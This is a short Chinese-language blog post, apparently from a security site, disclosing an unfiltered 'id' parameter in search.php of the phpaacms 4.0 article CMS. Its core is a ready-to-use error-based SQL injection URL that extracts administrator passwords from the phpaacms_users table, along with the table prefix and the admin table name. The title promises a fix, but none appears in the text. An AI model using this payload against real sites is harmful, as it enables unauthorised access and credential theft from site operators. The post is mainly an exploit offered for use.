phpaacms 4.0 Sql 注入0day漏洞及修复

分类:安全 | 2011-07-30 | 撸过 75 次
0人扯谈

phpaacms是一套免费开源的简洁文章管理系统cms.

漏洞文件:search.php //变量$_GET[‘id’]过滤不严造成的注射

测试EXP:

https://www.webshell.cc/phpaacms/search.php?id=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20concat(0x7e,0x27,phpaacms_users.password,0x27,0x7e)%20FROM%20`phpaa`.phpaacms_users%20LIMIT%201,1)%20)%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1

数据表前缀:

phpaacms_

管理表:

phpaacms_users

本站内容均为原创,转载请务必保留署名与链接!
phpaacms 4.0 Sql 注入0day漏洞及修复:https://www.webshell.cc/7.html
标签:

随机日志